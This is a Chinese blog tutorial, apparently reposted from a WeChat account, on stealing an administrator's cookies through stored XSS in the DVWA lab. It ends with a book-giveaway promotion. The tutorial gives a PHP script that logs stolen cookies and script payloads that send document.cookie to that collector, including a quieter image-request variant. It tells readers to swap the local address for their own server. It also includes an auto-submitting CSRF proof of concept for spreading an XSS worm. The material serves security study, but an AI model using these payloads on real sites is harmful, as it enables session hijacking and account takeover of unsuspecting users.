使用Xss抓取对方管理员的Cookie(文末周福利赠书)

原创
2020/11/12 12:30
阅读数 185







什么是cookie



cookie是曲奇饼,啊开个玩笑,cookie是每个用户登录唯一id和账号密码一样可以登录到网站,是的你没有听错cookie可以直接登录,至于服务器怎么设置


cookie



和cookie存储这里就不说了,需的要自行百度


xss盗取cookie(dvwa演示)



学习xss时觉得啊这,不就是一个弹窗吗,有啥用,经过学习后发现xss的危害还是挺大的,弹窗的目的只是说明这里可以执行动态脚本,那就可以干很多事情了


环境配置



官网:http://www.dvwa.co.uk/


下载地址:https://github.com/ethicalhack3r/DVWA


下载方式:zip下载或git https://github.com/ethicalhack3r/DVWA


下载完成放入http服务下即可

我使用的是phpstudy下载地址:https://m.xp.cn/


设置接受盗取cookie方式



xss盗取的cookie肯定是要保存到我们自己的服务器上,可以设置一个接受cookie的php网页代码接受到请求携带cookie后保存到文件或者数据库中等都可以,


当然也可以不设置存储,随便请求一个一个服务器网页存在不存在无所谓,因为请求可以保存到日志文件,但是看起来可能不方便而已,下面是保存cookie的php代码


<?php

if(isset($_GET['cookie'])) //如果接收到cookie
{
$file = fopen('./cookie.txt', 'a'); //打开存储的文件
fwrite($file, $_GET['cookie']."\r\n"); //将获取的cookie存储
fclose($file); //关闭文件
}

放置xss(这里用存储型xss测试)


<script>document.location='http://127.0.0.1/cookies/cookies.php?cookie='+document.cookie;</script>

我这里用的本地的测试,document.cookie,就是获取cookie,然后携带cookie访问http://127.0.0.1/cookies/cookies.php?(换成自己服务器ip就可以了,这里我本地测试),先查看一下我们的cookie


然后点击我们放存储型xss的地方(xss(stored)),发现跳转到了令一个网站,并且携带了你的cookie



在到cookie.php目录查看cookie.txt,可以发现cookie已经被存储,


cookie被盗取,我们可以利用cookie进行登录


这种动静可能有点大,可以用js加载图片的方式来发送带有cookie的请求,


<script>new Image().src = 'http://127.0.0.1/cookies/cookies.php?cookie='+document.cookie;</script>

使用new Image()进行预加载(https://www.cnblogs.com/yangzhou33/p/9215937.html)


当然如果你还有其动静小的方法可以留言,当然还可以用来加载其他的xss神器js代码


<script src=''>

xss蠕虫


前提条件

有存储型xss,可以csrf


原理(个人理解,如有错误可以评论联系我)



相关代码(只是简单的,有过滤,要考虑绕过)


主体存储xss


<script>document.location='csrf地址';</script>

csrf生成
用burpsuite抓包,右键,如图选择,copy复制,然后放到自己服务器等等


当然也可以自己编写csrf的poc,使之功能更加强大,可以自己点击等等,还有一些绕过等等,这只是简单的csrf的poc




csrf演示代码,抓取的dvwa包加了js自动点击


<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/lmg/vulnerabilities/xss_s/index.php" method="POST">
<input type="hidden" name="txtName" value="æµ&#139;è&#175;&#149;" />
<input type="hidden" name="mtxMessage" value="æµ&#139;è&#175;&#149;" />
<input type="hidden" name="btnSign" value="Sign&#32;Guestbook" />
<input type="submit" value="Submit request" />
</form>
<script type="text/javascript"> // js自动点击
var form = document.getElementsByTagName('form')[0];
var input = document.getElementsByTagName('input')[3];
input.value = window.location.hash.substr(1);
form.submit();
</script>
</body>
</html>

受害者储存xss和主体xss类似只是跳转的网页不同


<script>document.location='csrf地址';</script>

个人思考




xss的蠕虫利用起来还是比较难的,要有存储型xss(还要各种绕过),和csrf,但是危害是很大的,不仅仅是传播文章,可以利用这个传播盗取更多人cookie,个人信息,位置,浏览器版本安装软件等等


xss利用的思考(持续思考)




像反射型xss,dom型的xss不在局限于点一个很长的链接,可以利用其他第三方网站来跳转,也可以利用短链接,也可以利用二维码,二维码捆绑一个链接,


所以扫描未知二维码是非常危险的事情


像存储型xss,可以利用储存型xss对其他网站进行流量攻击


说明:本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担


来源: Script kiddie's life
文章链接: https://lnng.top/posts/b0f.html



【粉丝周福利时间-1



黑客攻防从入门到精通 推荐系列:(零基础适用)


步步深入、由浅入深——使初学者和具有一定基础的用户都能逐步提高,快速掌握黑客防范技巧与工具的使用方法。

注重实用性——理论和操作相结合,并配以大量插图,让读者像看电视节目一样学习黑客攻防技术,使学习效果立竿见影。

大量操作实例——读者可以一边学习,一边在计算机上操作,做到即学即用、即用即得。

附赠:黑客攻防讲解视频


内网安全攻防:据说改变了一个人的一生


由浅入深,全面、系统地讨论了常见的内网攻击手段和相应的防御方法,力求语言通俗易懂、示例简单明了,以便读者阅读领会。

阅读本书不要求读者具备渗透测试的相关背景。


活动规则:


在“ 暗网黑客”公众号后台回复 “抽奖”, 转发此 文章到 朋友圈(不分组) ,即为成功参与抽奖活动

转发不屏蔽列表好友,随机抽取 2名粉丝 送书一本(二选一), 中奖者获奖后必须 凭分享“截图”领奖

 扫码进入公众号后台参与抽奖
               回复“抽奖”                   
                          


后台登记截止时间:2020 /11/ 13 17:30

开奖时间:2020 /11/14(本周六)12:30



【粉丝周福利时间-2


注:课程在不断更新,教务人员正在筹划新内容,后续将上传新内容视频!


电子书如图:






本文分享自微信公众号 - 暗网黑客(HackRead)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

展开阅读全文
打赏
0
0 收藏
分享
加载中
更多评论
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部